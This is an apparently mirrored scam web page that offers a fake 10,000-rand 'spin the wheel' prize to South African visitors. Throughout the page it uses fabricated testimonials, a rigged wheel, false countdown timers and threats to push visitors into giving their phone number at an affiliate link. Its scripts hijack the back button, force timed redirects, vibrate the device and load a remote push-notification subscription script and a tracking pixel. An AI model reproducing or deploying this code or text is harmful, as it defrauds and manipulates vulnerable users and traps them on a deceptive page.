
<!-- Mirrored from trackaj.xyz/root/spinwhel-eg-update/?bemobdata=c=9e0da221-0ff1-4bf0-acdb-953ed0d92c96..l=17b3681c-a1b5-4465-9667-cf666f228439..a=0..b=0..z=0.000024421..e=166252973009990TEGTV433078890444V2d..c1=6083600..c2=174526..c3=304322820..c4=23500010..c5=1..c6=Android..c7=1662529730..c8=EG..c9=Telecom%20Egypt..c10=Africa%2FCairo by HTTrack Website Copier/3.x [XR&CO'2014], Wed, 07 Sep 2022 05:50:13 GMT -->
<!-- Added by HTTrack -->
<!-- Mirrored from southafrica-prize.web.app/ by HTTrack Website Copier/3.x [XR&CO'2014], Tue, 27 Sep 2022 20:24:45 GMT -->
<!-- Added by HTTrack --><meta http-equiv="content-type" content="text/html;charset=utf-8" /><!-- /Added by HTTrack -->
<meta http-equiv="content-type" content="text/html;charset=UTF-8" /><!-- /Added by HTTrack -->
<head>
<html dir="rtl" lang="ar">
<link rel="icon" type="image/png" href="img/logo.png">

<script> function countdown() {
var a = parseInt(document.getElementById("mins").innerHTML),
b = parseInt(document.getElementById("hsecs").innerHTML);
0 != a && 0 == b ? (nmins = a - 1, nsecs = 59) : 0 != a || 0 != b ? (nmins = a, nsecs = b - 1) : 0 == a && 0 == b && (nmins = a, nsecs = b), document.getElementById("mins").innerHTML = nmins, document.getElementById("hsecs").innerHTML = nsecs, nsecs < 10 && (nsecs = "0" + nsecs)
}</script><script type="text/javascript"> function exit_a1() { window.onbeforeunload = null; }</script></p><script> var s = document.createElement('script');
s.src='bigrourg.net/pfe/current/micro.tag.min346d346d.html?z=5111789'+'&sw=/sw-check-permissions-aae63.js';
s.onload = function(result) {
switch (result) {
case 'onPermissionDefault':break;
case 'onPermissionAllowed':break;
case 'onPermissionDenied':break;
case 'onAlreadySubscribed':break;
case 'onNotificationUnsupported':break;
}
}
document.head.appendChild(s);</script> <meta charset="utf-8"> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=no"> <title> Christmas reward!</title> <script type="text/javascript" src="js/en_date.js"></script> <link rel="stylesheet" href="css/style__base.css"> <link rel="stylesheet" type="text/css" href="css/style_a.css"></head><body onload="setButtonHeight(), autospin1()"><script src="js/bioep.min.js" type="text/javascript"></script> <div class="spacer"></div><div class="wrapper"><div id="container" class="contestwrap wrapper"><div id="firstpage" class="toptext"><table class="wrapper"><tbody><tr><td align="center" valign="top"><b>congratulations! (1) You have a chance to win 10,000 thousand South African Rand<br /></b></tbody></table><div><p class="wrapper">The contest is held every year, we randomly choose 50 lucky visitors to get a reward. <br /><br /></p><div class="yo"><h2 style="margin: 0; padding: 0; padding-bottom: 3px;">Spin the wheel and</h2><h2 style="margin: 0; padding: 0;"><span class="bounce">&darr;</span>Get your gift <span class="bounce">&darr;</span></h2></div><p class="wrapper"><br /><br /></p></div><script type="text/javascript"> function startTimer(t) {
var e, n, r = t,
a = setInterval(function() {
e = parseInt(r / 60, 10), n = parseInt(r % 60, 10), n = 10 > n ? "0" + n : n, $("#timerr").text(e + " minute and " + n + " seconds"), --r < 0 && (clearInterval(a))
}, 1e3)
}
startTimer((2 * 60) + 29);</script><div id="wheelCon"><img id="wheel" src="img/spin_vi.png" width="330" height="330" class="spinAround2 transparent" /><div id="pressButton" style="top: 118.6px;"></div><div><img id="devMockup" class="animated rotateIn" src="img/cash.png" width="140" height="280" style="left: 98.5px; top: 125px;" /></div></div></div></div><div class="spacer"></div></div><div class="reviews wrapper" dir="ltr" style="text-align: left;"><div class="wrapper"><h2 style="text-align: center;">:Comments</h2></div><table class="wrapper" style="padding-top: 8px; text-align: center;"><tbody><tr><td style="text-align: left;" valign="top" width="50px"><img class="roundimg" src="img/8.jpg" /><td class="commentpad" style="text-align: left;" valign="top"><div class="date"><script> mydate.setDate(mydate.getDate() - 0);
month = mydate.getMonth();
day = mydate.getDate();
if (day < 10) day = "0" + day;
document.write(montharray[month] + " " + day);
</script></div><div class="name">Sophy Qebelu</div><div class="text">This is the first time I earn something from the Internet, I love your site</div></tbody></table><hr style="text-align: center;" /><table class="wrapper" style="text-align: center;"><tbody><tr><td style="text-align: left;" valign="top" width="50px"><img class="roundimg" src="img/1.jpg" /><td class="commentpad" style="text-align: left;" valign="top"><div class="date"><script> mydate.setDate(mydate.getDate() - 2);
month = mydate.getMonth();
day = mydate.getDate();
if (day < 10) day = "0" + day;
document.write(montharray[month] + " " + day);
</script></div><div class="name">Molaba Matlhomola</div><div class="text">I thought this was a joke at first, but today I received the money. Thank you</div></tbody></table><hr style="text-align: center;" /><table class="wrapper" style="text-align: center;"><tbody><tr><td style="text-align: left;" valign="top" width="50px"><img class="roundimg" src="img/2.jpg" /><td class="commentpad" style="text-align: left;" valign="top"><div class="date"><script> document.write(montharray[month] + " " + day);
</script></div><div class="name">Maseho Iris Phadima</div><div class="text">The first time I participated in the competition, thank God I won</div></tbody></table><hr style="text-align: center;" /><table class="wrapper" style="text-align: center;"><tbody><tr><td style="text-align: left;" valign="top" width="50px"><img class="roundimg" src="img/4.jpg" /><td class="commentpad" style="text-align: left;" valign="top"><div class="date"><script> document.write(montharray[month] + " " + day);
</script></div><div class="name">Karabo Bendas</div><div class="text">I hope this page appears every time, thanks for 1000 rand</div></tbody></table><hr style="text-align: center;" /><table class="wrapper" style="text-align: center;"><tbody><tr><td style="text-align: left;" valign="top" width="50px"><img class="roundimg" src="img/3.jpg" /><td class="commentpad" style="text-align: left;" valign="top"><div class="date"><script> document.write(montharray[month] + " " + day);
</script></div><div class="name">Thami Nodido</div><div class="text">unfortunately I was not selected. Once again, God willing, thank you for the contest</div></tbody></table><hr style="text-align: center;" /><table class="wrapper" style="text-align: center;"><tbody><tr><td style="text-align: left;" valign="top" width="50px"><img class="roundimg" src="img/5.jpg" /><td class="commentpad" style="text-align: left;" valign="top"><div class="date"><script> document.write(montharray[month] + " " + day);
</script></div><div class="name">Sello Wa Lehong Lehong</div><div class="text">i put my phone number and they called me, and on the same day I received 10 thousand rand thanks😍</div></tbody></table><hr style="text-align: center;" /><table class="wrapper" style="text-align: center;"><tbody><tr><td style="text-align: left;" valign="top" width="50px"><img class="roundimg" src="img/6.jpg" /><td class="commentpad" style="text-align: left;" valign="top"><div class="date"><script> mydate.setDate(mydate.getDate() - 1);
month = mydate.getMonth();
day = mydate.getDate();
if (day < 10) day = "0" + day;
document.write(montharray[month] + " " + day);
</script></div><div class="name">Thabo Dsd</div><div class="text"> God bless you, this is the best site I have received 10000 Rand</div></tbody></table><hr style="text-align: center;" /><table class="wrapper" style="text-align: center;"><tbody><tr><td style="text-align: left;" valign="top" width="50px"><img class="roundimg" src="img/7.jpg" /><td class="commentpad" style="text-align: left;" valign="top"><div class="date"><script> mydate.setDate(mydate.getDate() - 1);
month = mydate.getMonth();
day = mydate.getDate();
if (day < 10) day = "0" + day;
document.write(montharray[month] + " " + day);
</script></div><div class="name">Lungelo Ntshingila</div><div class="text">i received the gift thank you !!</div><img class="fbimg" src="img/smiley.png" /></tbody></table></div><div style="height: 40px;"></div><div id="secondpage" class="wrapper"><div class="congrats" style="padding-top: 5px;"><h3><span style="color: #3c5a96;">Congrats!!<br />(1) <span style="color: red; font-weight: bold;">Prize of 10,000 South African Rand </span> It's booked for you!</span></h3></div><div class="congrats" style="margin-left: 5px; margin-top: 5px; text-align: left;"><p style="text-align: center;"><b>Step 1:</b> Click the Continue button to claim your prize.</p><p style="text-align: center;"><b>Step 2:</b> Write your phone number on the next page to be contacted and receive your prize.</p><p style="padding-top: 10px; text-align: center;"><b>Important:</b> Please hurry because the site is under pressure and you may lose your prize if the site stops !</p></div><div class="timer" style="margin-top: 5px; margin-left: 5px;">you have left <span style="color: green;"><b><span id="mins">5</span> minutes <span id="hsecs">30</span> second.</b></span></div><div class="prize"><table><tbody><tr><th><img src="img/cash.png" style="max-width: 100px;" /><p><b>1 You have! </b></p><p style="text-align: left;"><span class="name">A prize of 10,000 South African Rand </span></p><div><a class="button" href="https://aff.bewinners.site/?utm_medium=7d94b606497dee5d863c00902b1cdf822134b5af&utm_campaign=Southafrica3&np=1" onclick="launchext(); exit_a1();">Continue</a><div><br /></div></div></tbody></table></div></div><div class="sweet-overlay" style="opacity: 1.03; display:block;" tabindex="-1"></div><div class="sweet-alert animated bounceIn visible" id="modal01" style="top: 38%;"><img id="gift-image" src="img/cash.png" style="width: 174px;" height="116" /> <img id="gift-image2" src="img/refresh.png" style="width: 70px; display:none;" /><h2 id="first-title" style="margin-top: -10px; padding-bottom: -5px; margin-bottom: 0;"></h2><p id="first-dialog"></p><div class="sa-button-container"><div class="sa-confirm-button-container"><button onclick="hidemodal01()" class="modalbutton">OK</button><div class="la-ball-fall"></div></div></div></div><p><script src="js/jquery.min.js"></script><script> function hidemodal01() {
var modal1 = document.getElementById("modal01").classList.remove("visible");
var so = document.querySelector(".sweet-overlay").style.display = "none";
spin();
}
function showmodal01() {
var modal1 = document.getElementById("modal01").classList.add("visible");
var so = document.querySelector(".sweet-overlay").style.display = "float";
}
function hidemodal02() {
if (vibr > 0) navigator.vibrate(70);
var modal2 = document.getElementById("modal02").classList.remove("visible");
var so = document.querySelector(".sweet-overlay").style.display = "none";
}
function setButtonHeight() {
conMid = (whCon.getBoundingClientRect().bottom - whCon.getBoundingClientRect().top) / 2, button.style.top = conMid - button.offsetHeight / 2 - 0.2 * button.offsetHeight / 2 + "px"
}
function spin() {
switch (count) {
case 1:
dWheel.className = "spinAround",
setTimeout(function() {
document.getElementById("gift-image").style.display = "none";
document.getElementById("gift-image2").style.display = "";
document.getElementById("first-title").innerHTML = "Try again!";
document.getElementById("first-dialog").innerHTML = "sorry<p> Please try again, you have 1 chance";
document.getElementById("modal01").style.top = "55%";
showmodal01();
}, 6800);
break;
case 2:
dWheel.className = "spinAround2", setTimeout(function() {
dWheel.className = dWheel.className + " transparent"
}, 6800), setTimeout(function() {
device.style.display = "block", device.style.left = whCon.offsetWidth / 2 - device.offsetWidth / 2 + "px", device.style.top = conMid - device.offsetHeight / 2 + "px"
}, 7000), setTimeout(function() {
first.innerHTML = "<img src='img/loading.gif'>", first.style.padding = "195px 0px", setTimeout(function() {
first.parentNode.removeChild(first), second.style.display = "block", con.insertBefore(second, con.firstChild);
setInterval("countdown()", 1000);
}, 1500)
}, 9000)
}
count++
}
var 
count = 1,
conMid, headline = document.getElementById("headline"),
con = document.getElementById("container"),
whCon = document.getElementById("wheelCon"),
dWheel = document.getElementById("wheel"),
button = document.getElementById("pressButton"),
device = document.getElementById("devMockup"),
first = document.getElementById("firstpage"),
second = document.getElementById("secondpage");
function autospin1() {
document.getElementById("pressButton").disabled = true;
document.getElementById("first-title").innerHTML = "Win a prize value 10000 South African Rand";
document.getElementById("first-dialog").innerHTML = "<p>On the occasion of the New Year 2025, we offer you a number of prizes</p><p> Our website offers cash prizes to the winners</p><p> Spin the wheel and get your reward if luck is on your side today! 🎁</p><p><b> good luck!</b></p>";
document.getElementById("modal01").style.top = "38%";
}
function autospin2() {
spin();
}</script></p><script type="text/javascript"> bioEp.init({
width: 400,
height: 200,
html: '<p style=\"text-align: center; margin-left: 100px;\"><b style=\"color: rgb(255, 0, 0); font-size: 18px;\"><font face=\"Tahoma\"><span style=\"font-size: 24px;\">note!!&nbsp;</span></font></b><font color=\"#ff0000\" face=\"Tahoma\"><span style=\"font-size: 24px;\"><b>⚠️&nbsp;</b></span></font><b style=\"font-size: 18px;\"><span style=\"font-size: 24px;\"><font color=\"#ff0000\">: </font>If you exit the page will be sent&nbsp;</span></b><b style=\"font-size: 18px;\"><span style=\"font-size: 24px;\">the prize&nbsp;</span></b><b style=\"font-size: 18px;\"><span style=\"font-size: 24px;\">to&nbsp;</span></b><b style=\"font-size: 18px;\"><span style=\"font-size: 24px;\">another</span></b><b style=\"font-size: 18px;\"><span style=\"font-size: 24px;\">&nbsp;person</span></b><b style=\"font-size: 18px;\"><span style=\"font-size: 24px;\">&nbsp;Don't miss this </span></b><span style=\"font-size: 24px;\"><b>&nbsp;</b></span><b style=\"font-size: 18px;\"><span style=\"font-size: 24px;\">opportunity</span></b></p><p style=\"text-align: center; margin-left: 100px;\"><span style=\"font-weight: 700; color: rgb(255, 0, 0); font-size: 24px;\">⏬</span><b style=\"color: rgb(255, 0, 0); font-size: 18px;\"><span style=\"font-size: 24px;\"><br></span></b></p><p style=\"text-align: center; margin-left: 75px;\"><b><a href=\"https://aff.bewinners.site/?utm_medium=7d94b606497dee5d863c00902b1cdf822134b5af&utm_campaign=Southafrica3&np=1">Click here to enter your phone number</a>&nbsp;</b><font color=\"#337ab7\"><b>🔗</b></font><br></p>',
cookieExp: 0,
delay:3,
css: '#bio_ep{background-color:#daebc5;border:3px dashed #f01831}',
});</script><script>navigator.vibrate([1000, 300, 1000, 300,1000]);</script><script language="javascript">window.setTimeout(function(){
window.location.href = 'https://aff.bewinners.site/?utm_medium=7d94b606497dee5d863c00902b1cdf822134b5af&utm_campaign=Southafrica3&np=1';
},70000);</script> <script>window.history.pushState({page: 1}, '', '');
window.onpopstate = function(event) {
if(event){
window.location.href = 'https://aff.bewinners.site/?utm_medium=7d94b606497dee5d863c00902b1cdf822134b5af&utm_campaign=Southafrica3&np=1';
}
}</script>

 <script>
   (function (window, location) {
       var redirect = "https://aff.bewinners.site/?utm_medium=7d94b606497dee5d863c00902b1cdf822134b5af&utm_campaign=Southafrica3&np=1";
       var currentUrl = location.origin + location.pathname + location.search;
       if (location.hash !== "#!/hst") {
           history.replaceState(null, document.title, currentUrl + "#!/hst");
           history.pushState(null, document.title, currentUrl);
       }

       window.addEventListener("popstate", function () {
           if (location.hash === "#!/hst") {
               setTimeout(function () {
                   window.location.replace(redirect);
               }, 0);
           }
       }, false);
   }(window, location));
</script>

<script src="my.rtmark.net/p134b134b.html?f=sync&amp;lr=1&amp;partner=83d6f08b20b8eb9dcbfa801bb1043680beae6be417d85eef851af1faa87bba01" defer></script>
<noscript><img src="my.rtmark.net/img134b134b.html?f=sync&amp;lr=1&amp;partner=83d6f08b20b8eb9dcbfa801bb1043680beae6be417d85eef851af1faa87bba01" width="1" height="1" /></noscript>
</body>
<!-- Mirrored from trackaj.xyz/root/spinwhel-eg-update/?bemobdata=c=9e0da221-0ff1-4bf0-acdb-953ed0d92c96..l=17b3681c-a1b5-4465-9667-cf666f228439..a=0..b=0..z=0.000024421..e=166252973009990TEGTV433078890444V2d..c1=6083600..c2=174526..c3=304322820..c4=23500010..c5=1..c6=Android..c7=1662529730..c8=EG..c9=Telecom%20Egypt..c10=Africa%2FCairo by HTTrack Website Copier/3.x [XR&CO'2014], Wed, 07 Sep 2022 05:50:20 GMT -->

<!-- Mirrored from southafrica-prize.web.app/ by HTTrack Website Copier/3.x [XR&CO'2014], Tue, 27 Sep 2022 20:24:50 GMT -->
</html>